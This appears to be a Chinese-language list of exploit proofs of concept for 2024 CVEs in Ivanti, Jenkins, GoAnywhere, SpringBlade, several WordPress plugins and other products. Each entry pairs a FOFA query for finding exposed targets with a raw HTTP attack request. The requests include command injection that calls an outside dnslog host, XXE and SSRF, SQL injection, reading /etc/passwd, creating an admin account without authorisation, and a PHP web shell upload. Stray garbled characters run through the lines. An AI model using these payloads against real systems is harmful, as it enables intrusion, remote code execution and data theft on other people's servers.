5 A5 ~ m1 o" Y% R1 T5 gid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B6 W( u) X- P/ h& h
- `% u. j+ d: W; y' s
5 T6 @' c: y: U% d0 c" G, g99. Ncast盈可视高清智能录播系统busiFacade RCE
8 D$ u: C- p* f7 p$ h1 A! rCVE-2024-0305
g3 ~" b# V6 J& fFOFA:app="Ncast-产品" && title=="高清智能录播系统"2 o% k* z4 q6 _) X2 x
POST /classes/common/busiFacade.php HTTP/1.1
& s# ^8 l$ a }5 |5 pHost: 192.168.40.130:8080$ i7 V- V4 h& A( L- S* B. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* e( s: w2 K( T7 M
Connection: close! c, K/ O6 M* ]9 U+ }. ], {
Content-Length: 154/ ]6 V+ m- g9 p( T% z$ T4 M
Accept: */*+ ~* e0 k" i: K& L2 X4 q. m
Accept-Encoding: gzip, deflate
, M- R# A+ N7 C& i" D* f) EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: S1 q4 j; P( L
Content-Type: application/x-www-form-urlencoded; charset=UTF-8- s( ~: H+ G3 Y4 k* O, }
X-Requested-With: XMLHttpRequest
6 R, R2 h( D' B! y! Y
. }( J5 t$ E1 |, c! _: t: ]# z3 Q%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
: z* M) t4 U! ^" }6 S( i6 r+ X- {; u" Z
. \' B7 ]) ^# K% ]9 j! O- V100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传 r/ v2 u @8 `, x, \) L
CVE-2024-0352" t4 J; M$ l- ^' ~! |& M9 l
FOFA:icon_hash="874152924": b2 D4 _; M: m5 n$ u! O
POST /api/file/formimage HTTP/1.1$ C, U5 I' ~ D r, H
Host: 192.168.40.1303 Z" T% R. p6 O1 r5 a R+ B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36& {8 I0 F* G# z- C) U! b
Connection: close' W/ P2 ^# t" g3 k
Content-Length: 201
, _4 z* k! @, t( J/ G: b3 `, Y KContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei4 C2 r/ N V; T8 `/ f; c3 B
Accept-Encoding: gzip
2 o1 T2 ? A- Z" \" h, h2 G
8 R5 i. `2 W6 l- {: G9 f------WebKitFormBoundarygcflwtei* a, j5 L' M, T; ~0 Y1 X
Content-Disposition: form-data; name="file";filename="IE4MGP.php"$ D5 I( {: F- {5 j$ b3 q: D" g* Q( u
Content-Type: application/x-php
- t# ~1 |9 N' e9 L
1 r% C/ f. |" y' k6 |/ M$ V/ o2ayyhRXiAsKXL8olvF5s4qqyI2O
+ ~6 F. X' ~5 ]! m# w------WebKitFormBoundarygcflwtei--8 [. _6 \2 G3 J e) O! n2 ]
/ k$ B1 ]% E( H0 n# `; O! |; L" o
. q M# Z! k- x8 r101. ivanti policy secure-22.6命令注入
, j3 y4 O% K; T5 g, r7 E; K7 ACVE-2024-21887: i' ]4 u* E0 q% D0 C
FOFA:body="welcome.cgi?p=logo"
7 H3 Z* ?. _& D* HGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' f; O+ V) I' @9 i8 ^: u8 j
Host: x.x.x.xx.x.x.x4 o7 O1 n0 \" t b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; W _6 y" K$ A9 T4 c3 ~) LConnection: close
. o- t5 A1 H. |! q5 bAccept-Encoding: gzip
. m/ `( b. O$ \" n4 m( |5 x+ {6 t% m9 c5 V1 X
. ~! U. ]7 t$ y5 G102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& y D5 u% N6 q9 P+ t' y
CVE-2024-21893& D+ w3 l# N2 }3 L8 w V Y
FOFA:body="welcome.cgi?p=logo"4 U2 w8 f( `- e$ g: I
POST /dana-ws/saml20.ws HTTP/1.1( c8 z9 @9 ~' @/ X
Host: x.x.x.x" S c, v' e2 K. t3 j8 A; c% M6 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 m; F9 k' f- x3 p' o
Connection: close* ~) }( d4 N! ?) C4 f# N/ n
Content-Length: 792
t: p* K2 ~' gAccept-Encoding: gzip
6 p% ~( p$ E' }5 ?4 q2 b5 o
- ]6 ?2 X7 E+ ] @& z. t<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
3 l U2 t) J+ o+ n% E1 a( Z6 o K+ P! T8 A% s! r- ?
103. Ivanti Pulse Connect Secure VPN XXE/ O' D" O5 |, l( P2 M i* R8 Z
CVE-2024-22024# e- _$ O7 n2 |- Z
FOFA:body="welcome.cgi?p=logo"& h) o6 @' @% a+ k$ i m- n
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
! K! z& w3 U" t" S; p0 `Host: 192.168.40.130:1113 f2 ]- \- z. A2 o. ^9 D4 B ?5 m
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
( I' Z" I" n- |) b+ pConnection: close
3 `: Z ~3 {- b/ { X, GContent-Length: 204
n. j1 m, g( j+ vContent-Type: application/x-www-form-urlencoded' k" J% W9 E! ]) o
Accept-Encoding: gzip
- Z7 S0 [, |$ ~
; l3 X" j" t( z( W# @SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
8 G [& [2 {: K3 M
* N! l; q: \1 Y+ u
8 e/ E* I8 R/ d( @9 f其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
& W9 D7 u: J6 a, f6 v4 P<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>; f# w% S2 Z- s, Q8 f# G, R) u. R
# g5 u% }( g( W @: x/ @" j5 Z- Q# K6 g# @; k5 t$ q! ]7 i$ O
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
" l* a4 A6 B( R# c" h4 j1 yCVE-2024-0569
6 F( F, j" a+ o; M XFOFA:title="TOTOLINK"
9 y* A$ a8 w* Z" kPOST /cgi-bin/cstecgi.cgi HTTP/1.1
; u5 @+ X$ [3 f0 Z% UHost:192.168.0.1- {% j2 n2 S- K
Content-Length:41
W/ ^6 j5 _6 T* |; |1 N* F, J8 JAccept:application/json,text/javascript,*/*;q=0.01
) x1 Q( q* P* uX-Requested-with: XMLHttpRequest- @6 x, U3 Y3 y. l0 p- G4 `
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36. I" k: _7 N$ ^# L8 T' @
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
" z; P7 a* C" C7 r/ c% s7 [Origin: http://192.168.0.1! @; X$ D: p5 L# w" \) Q
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
# l4 ]2 n0 \- F, qAccept-Encoding:gzip,deflate
0 T4 D) h. x& X* ZAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7 e: Q- I, d- I( M
Connection:close
1 \" R- s) I8 c" F$ q9 h! r, B) Z; a: d& }, A' y. I6 u
{
, _5 z: H% a! e2 s. m3 S. o& }* u"topicurl":"getSysStatusCfg",! \% t) X% J3 |* Y' v) L' F
"token":""( `, h% A5 U- _) S
}
+ u P9 G I* F; P+ y: r0 z4 K9 H$ b
105. SpringBlade v3.2.0 export-user SQL 注入0 h* {; o7 g' X3 x8 b- L' k4 @
FOFA:body="https://bladex.vip". @; Q1 H2 B/ u8 ^/ |
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
3 L: n) ^% d0 ^6 S0 O9 d' T! L+ W7 y) c. A
106. SpringBlade dict-biz/list SQL 注入! e2 X2 {3 O. w9 g6 e
FOFA:body="Saber 将不能正常工作"' p1 e" v8 h* N1 R, M7 A9 W% G- H
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
5 X; \4 ]5 a' I- ]Host: your-ip2 e! J' Y; o% E# H/ T' p* N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 t0 J ?! `3 I% u4 TBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
, G$ |6 `6 M; b7 D7 ZAccept-Encoding: gzip, deflate
2 \- K# U" M8 @3 L+ E U6 fAccept-Language: zh-CN,zh;q=0.93 M% Z& Q% }$ F- s9 W! R9 i
Connection: close: H, X: i7 k7 N3 n& p
3 H/ q" l. x/ A* r
+ L/ b0 G4 {' E c+ o, k+ t2 Q: U
107. SpringBlade tenant/list SQL 注入
7 R$ e9 F5 \8 L9 @: u- jFOFA:body="https://bladex.vip"
; O. t) o% ~4 q' k! j" NGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
- r, n6 l9 X* c: QHost: your-ip9 a" P, f- F4 g+ N, w2 ~# Y1 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& E6 h! E x- Q( eBlade-Auth:替换为自己的& U/ [& |# v9 N4 c8 T
Connection: close
3 i& O" h( s% @4 x" {1 x6 u( e
, N: x# E Q, Y- G/ U' C: E
" g8 P* E3 N$ z% U5 V) ]108. D-Tale 3.9.0 SSRF
* p0 T2 w& c+ ?" o. nCVE-2024-21642
& f; K; Z- E' T" J7 \: v( L& SFOFA:"dtale/static/images/favicon.png"/ L. S5 e6 n& R
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1& n9 @. _; R( T+ |& B
Host: your-ip, Q$ [* ^3 A3 J! k9 ~5 B2 t- W
Accept: application/json, text/plain, */*
( Y2 l9 W2 H I. H, d# |% c3 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; ^$ G+ W! t6 Q9 E5 ]
Accept-Encoding: gzip, deflate
6 n$ q7 O T7 \$ c/ g4 sAccept-Language: zh-CN,zh;q=0.9,en;q=0.89 z# t: W2 X: J6 R
Connection: close
5 x6 ]/ A$ i2 [# h
' T% I8 O$ x' ~+ Q' s8 G2 p2 y' z7 M- H: W. \# }
109. Jenkins CLI 任意文件读取) V' Y; G* ^$ Q6 j' _# D
CVE-2024-23897: q4 G* a. S. l' B: x4 I
FOFA:header="X-Jenkins"
W. q: t0 x W& ZPOST /cli?remoting=false HTTP/1.1
5 }0 f. V: r) W* HHost:
% ]9 M* O9 ^$ H* b1 _, t9 wContent-type: application/octet-stream
$ d1 s) ^) o! r$ \: A2 ^9 k+ uSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92% o x! C3 N' c2 @' {* E
Side: upload* B- ~# a1 ]* h5 {1 t+ D
Connection: keep-alive5 O1 ?& ]+ R+ T, ?
Content-Length: 163
$ f8 X! [, U0 }5 b
( ?2 `3 [" Z M& i; Z- `$ Db'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'9 J5 `5 _8 w v3 K4 h, b
# ~ V5 q1 ?- m! i) C! y
8 P, D8 Z' X0 g4 x9 |POST /cli?remoting=false HTTP/1.1
: C R* O' M7 i! A) RHost:
' q# w' `6 k6 d j* r, T* mSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
" ?% u1 m' R- e* K4 ndownload8 Q7 x0 }8 c9 U6 t
Content-Type: application/x-www-form-urlencoded
2 b- L+ i0 v% \ jContent-Length: 0
% ~7 K5 ^. e$ v8 m5 p" Y; I) s# \( E! T1 p
( @) ^1 P$ u: N- M6 b( e6 hERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
% B3 o9 A+ r5 H7 Zjava -jar jenkins-cli.jar help4 h, _* W" z5 D" T. c
[COMMAND]
0 y1 l) N- C! X+ F; Z( R( eLists all the available commands or a detailed description of single command.5 w6 I* s3 v+ {8 z3 t3 {! K5 ~" y% a& x
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
1 q$ m9 P4 I4 c: ~3 O# ^
5 I1 W' g0 h5 s! z. e. T+ A! g! o( F
110. Goanywhere MFT 未授权创建管理员! K+ b4 d; A" Q( ^) ?
CVE-2024-0204
l& C; P7 o( L/ A8 m$ {' NFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
C4 J) T, a% X) n7 @; k7 n5 W1 k/ GGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
( t3 v6 a( T; d# d* AHost: 192.168.40.130:8000, e9 i# l& G6 }, { D
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.367 T3 a2 K4 g' s( O/ Z8 b
Connection: close i) @) a7 y8 n3 n0 q2 y$ e6 ^
Accept: */*2 q0 T s! S; Q# {
Accept-Language: en
, A( `* U. A7 D" r3 Y# HAccept-Encoding: gzip
+ v4 q1 ~( w1 X
0 D/ T6 g" k9 ?& O; a' I4 a) ~- X
111. WordPress Plugin HTML5 Video Player SQL注入 [5 I/ J' L t B
CVE-2024-1061
" O- k( \3 u7 c" ]! dFOFA:"wordpress" && body="html5-video-player"
7 I& x: d! x2 g8 c) SGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
/ T1 y- U& u2 e: R" hHost: 192.168.40.130:1129 |$ x. _5 o) @( ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' a' L$ n( _/ a/ PConnection: close( }0 p7 {' ~) D) V8 B
Accept: */*( p# j/ _2 w7 l5 \& _- b
Accept-Language: en
& M0 ~. m: w4 j6 |Accept-Encoding: gzip
0 ~5 g& `1 H& u3 l- e8 A: m
$ Q9 w( a6 b- E9 D; s$ `9 t- m+ v2 u
+ `3 M% d! ~, W( R& G! `' T112. WordPress Plugin NotificationX SQL 注入0 c; B ]3 z1 @3 a! G0 D) U' n+ Z& q. U
CVE-2024-1698
( ]' e# L! w6 F3 i" |$ }: k1 } }9 QFOFA:body="/wp-content/plugins/notificationx"4 O$ J( T5 x: b
POST /wp-json/notificationx/v1/analytics HTTP/1.1
# w$ s: Q$ \( u# I3 d5 m$ |Host: {{Hostname}}
9 @) u* w( J+ fContent-Type: application/json
3 G5 r4 A' E4 Q
1 I: T1 A8 H7 t9 g{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}0 \9 b4 B9 N9 G
0 ]" z" S' x9 F3 K8 s: }3 j
1 y ]" S- K/ S; X" b
113. WordPress Automatic 插件任意文件下载和SSRF
4 g. Z% ^: G5 D8 `( ZCVE-2024-27954
: A( U5 ]* _9 R& PFOFA:"/wp-content/plugins/wp-automatic"! f4 q7 t0 b' M
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.19 @5 |; I9 g) {0 n. \5 ]( e5 X
Host: x.x.x.x, _/ ~5 i, p9 T4 K3 n. h. c; `( U
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.364 q& d+ k$ Q1 b2 ~, H! l$ n
Connection: close8 U9 S' z6 t. H/ c; \" N! Z% i
Accept: */*9 y0 z0 k% k8 w- I% T6 A
Accept-Language: en
& X0 y5 V0 F- k+ d3 S7 h( ^Accept-Encoding: gzip% I' w& o1 r: t* X- _
. V. `9 z; D8 U( Z- E
# P) f! I2 x$ }7 j7 f
114. WordPress MasterStudy LMS插件 SQL注入0 j; f3 v. D4 J: D8 ~- F
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
, w! x4 y1 G5 I& qGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1# K. K0 R9 C3 O& t) d
Host: your-ip$ e1 z' ~$ q& Q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! K7 {* H7 [. X
Accept-Charset: utf-8: c% x& U+ k: f5 C& @' |4 a8 A8 H% k
Accept-Encoding: gzip, deflate0 C+ r$ o# z) W* w( D
Connection: close
0 S7 M( p4 ~ W5 V9 D0 [
" l' V, P! T) n$ G8 ^3 T6 ~. O V6 e+ c! b, ^
115. WordPress Bricks Builder <= 1.9.6 RCE1 A5 p7 Q. g* I3 q. M0 c3 j
CVE-2024-256005 p$ `+ V8 P9 p. a' L% q
FOFA: body="/wp-content/themes/bricks/"
! L* i' | e/ j5 Y1 Q* [1 P第一步,获取网站的nonce值
$ n: h6 r& i5 }* c( X0 [& \GET / HTTP/1.17 O- Q, P! l, D* v
Host: x.x.x.x5 T- r0 F1 f B! f8 y) G
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
! s5 ?& g' M& p+ z/ eConnection: close" _0 g7 o2 ^# U# L6 P$ |& P% [
Accept-Encoding: gzip- i/ o- w; ~9 e* D4 g4 Z) G
3 I6 ?9 c7 w. i- j/ p
' y/ x7 P- I' x2 p6 ]
第二步替换nonce值,执行命令' {+ [7 I# W2 p0 _) v
POST /wp-json/bricks/v1/render_element HTTP/1.11 @, D5 f* t3 q& g( q: U. C, k
Host: x.x.x.x
' q4 l# {: W" e4 O }* F7 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 ~0 N( j' T) k+ i* J& oConnection: close' }# J! F# w5 B4 k0 j8 {
Content-Length: 356
' I# h2 |- v- E8 eContent-Type: application/json5 D( t" p5 v! k0 j9 O
Accept-Encoding: gzip
* T c/ P1 M9 k! M, |" K% P1 \0 g" g% K; p
{
* M+ x2 s6 c/ M/ O, ], D7 i, }5 B"postId": "1",
; D) r% C+ F% k3 S7 { "nonce": "第一步获得的值",
/ g9 k9 u5 V& x! Z% b& U "element": {2 L o( Z& \% i& g
"name": "container",
8 O _' x: d6 r7 E/ w5 X" t "settings": {
, L) a% b/ P6 a# x8 i5 R "hasLoop": "true",
# k$ E, a6 P6 _' l( |& B "query": {
. m8 q F( r' V, R) k/ V! ]5 X "useQueryEditor": true,6 g( B% a. Y* H7 K* i
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
( r( l! \; w7 g( P% q "objectType": "post"
% \# B2 x% N7 P! L# ~+ |- S }5 Y2 b3 b3 D' V4 W/ Q+ o* M/ p i6 t5 f
}5 d5 ~3 L/ n* U$ x) A+ U! v
}
7 C2 ^; e; O# `- r}$ V p( @. ~ F2 T! U$ h
. O7 Q; {( G D/ l/ }
- c- v! {+ Q. a7 E5 r, W
116. wordpress js-support-ticket文件上传
1 @$ x( s# h1 sFOFA:body="wp-content/plugins/js-support-ticket"4 u4 T6 v( y$ v- t" Z- I
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
( Z% r( E; a$ L! ?( C) GHost:
/ z8 U+ H2 R6 A/ @9 kContent-Type: multipart/form-data; boundary=--------767099171
- U' m4 ?, e; T p- H/ v8 A) AUser-Agent: Mozilla/5.0
- N/ R5 }0 t- X) l ^7 v8 z
, V& u/ k/ c, l7 i! a0 m----------767099171
% v6 H! I9 X# j# W/ i- pContent-Disposition: form-data; name="action"
% }& c9 G% v6 Q. [" u7 jconfiguration_saveconfiguration
" p6 p- S5 v/ Z. |5 q3 [----------767099171
7 K. p$ s1 F( d7 ^3 UContent-Disposition: form-data; name="form_request"+ A# I% b5 i3 N6 \0 o
jssupportticket
+ s: Q8 F/ w0 p2 x; X5 q----------7670991715 [ ~" b5 H; l- j0 B3 a
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php". N1 I" O+ I T4 b
Content-Type: image/png! r. W6 X% Y) Y6 u
----------767099171--
- R! S8 C- {# M! k7 a9 h" q- J8 r; j4 t( Z5 H5 ]/ G) J
/ t, e/ n( i4 u4 \$ S+ g# ^( P
117. WordPress LayerSlider插件SQL注入% n0 x, @1 L8 V8 B3 v2 r
version:7.9.11 – 7.10.0
' N$ q1 [3 t$ y x$ b$ _FOFA:body="/wp-content/plugins/LayerSlider/"+ k0 X( r' K g4 R& d. o* ~7 k
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
n5 C+ \, q8 l$ `/ i: aHost: your-ip
/ O# n9 U; }2 H* ]* }- zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; z7 n" i$ @& X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 B- [ K/ p* s- cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 F; ]( f. D+ c" _- {Accept-Encoding: gzip, deflate, br* c0 v, w4 h# h. _" K# a
Connection: close7 w" W, W& t, k5 Z; ^
Upgrade-Insecure-Requests: 1% c3 U1 o% f0 R8 A2 c% B! g
* _5 Q* W5 m$ A
8 P0 _6 w: r* {- j3 Q, Q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 j& H1 H8 ~& e" L) fCVE-2024-0939
; s4 V0 S8 {% _0 H3 W. mFOFA:title="Smart管理平台"
: m3 @5 b& j' n' i2 R5 bPOST /Tool/uploadfile.php? HTTP/1.1 Z! _5 E5 b7 n" g0 i w
Host: 192.168.40.130:8443& Q; e0 B' L- h/ p3 G0 G7 X
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
# K; x- C% P) g; X! v) cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.06 t# Z' t- b/ y' c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 P- S( ^8 I7 |: [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 t8 U0 }! j' U+ c( D/ x# X% U1 x
Accept-Encoding: gzip, deflate
- @6 l* t. v$ E( ]' f w% fContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
. g3 k0 m# v1 ^: `$ eContent-Length: 4057 p: M* w% z# r. w! ~/ R1 v
Origin: https://192.168.40.130:8443
* K7 J0 s2 D( c3 r& d4 i# T" G* SReferer: https://192.168.40.130:8443/Tool/uploadfile.php4 w9 g! |" p2 M: k( C# v/ u
Upgrade-Insecure-Requests: 1# U M4 }8 s" ]; ] r. |
Sec-Fetch-Dest: document$ ]+ k2 K% v6 h. a1 G
Sec-Fetch-Mode: navigate
& q4 g7 ]/ N3 Z+ J; ^- A8 X. {/ ]Sec-Fetch-Site: same-origin+ C6 @ O4 s$ v+ ?
Sec-Fetch-User: ?1( t* E' A# b: J, Y) S
Te: trailers
) @% |* Z; E( B% MConnection: close
8 o9 p' F, M+ B/ j* y2 o; j) }3 j; m
-----------------------------13979701222747646634037182887
% X Q' e( [/ ?* D, ]$ n/ I4 w( nContent-Disposition: form-data; name="file_upload"; filename="contents.php"
: ~2 C1 k2 h' z3 pContent-Type: application/octet-stream0 H4 \$ a5 r+ J
+ A5 A; {: J( w4 V<?php
/ ^3 B/ v8 V% i$ Isystem($_POST["passwd"]);* E d! f s! ]' W" |
?>
1 C* T$ _& A: s) o& C7 J9 j9 A4 @* I; ?-----------------------------13979701222747646634037182887
7 O o2 a7 N, z- R. IContent-Disposition: form-data; name="txt_path"
$ W9 B4 B7 I. `. Z
7 |" c( D1 N) v3 _9 W4 a/home/src.php
+ d1 ]' @4 v* `+ j' O5 |-----------------------------13979701222747646634037182887--
+ h# i* ?. ?8 N) T! b* F
% G( E/ l+ C0 U* G
. F# L' G; i" L* @8 e/ ?: ~访问/home/src.php/ `( c: g4 A: P$ q2 V8 w
* n0 \0 F# E. B% h5 |
119. 北京百绰智能S20后台sysmanageajax.php sql注入
; W/ q7 Q- |0 J8 q1 H6 B7 M' w- cCVE-2024-12543 i( C m9 ^ P3 P/ P) p
FOFA:title="Smart管理平台"/ Y0 L3 V& y: S- n& }
先登录进入系统,默认账号密码为admin/admin
& y; E" Y4 [+ v* IPOST /sysmanage/sysmanageajax.php HTTP/1.11" L: b5 Z5 n. P/ W* E, u
Host: x.x.x.x1 k3 t9 o, D2 A; k& N: s
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
" d; t) h: k: R& r) eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0* |, w6 V% l. j$ N* M$ U
Accept: */*' k' ~! ?- |, z9 m8 h7 e& Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 S) C. w( O2 ^3 k" PAccept-Encoding: gzip, deflate( \: D6 u$ _& D" y
Content-Type: application/x-www-form-urlencoded;- A. k, o8 {7 j4 @) _
Content-Length: 109/ ?8 p; f6 L" `& O9 Z# x9 D! x
Origin: https://58.18.133.60:8443( p$ k! ? Z) o. c! p
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
- J1 ?& q5 _% S5 T! d4 aSec-Fetch-Dest: empty
5 _9 J+ ^, |9 _; E! N0 a& ISec-Fetch-Mode: cors6 `: V% I5 {# R" W4 D7 Z' F
Sec-Fetch-Site: same-origin2 T2 H. |/ l5 ]5 F0 K5 O( q
X-Forwarded-For: 1.1.1.13 @4 F! l) h. Q) {2 K, t+ t* w
X-Originating-Ip: 1.1.1.1
2 l1 P. N3 s0 k zX-Remote-Ip: 1.1.1.1
5 j( w6 G9 I5 Y( ]X-Remote-Addr: 1.1.1.1
) S3 p" A9 b7 u/ A7 D3 MTe: trailers
) l- s5 g' k: @! _" c. S! \! e" o, }Connection: close
4 K" [6 T8 n/ l8 D# ], H9 M# o0 W2 M p, w& x+ j& C: }' x
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
- L+ {; g+ w# s& m: x$ k0 r- O, R! `$ [7 ~8 m' ~! ~
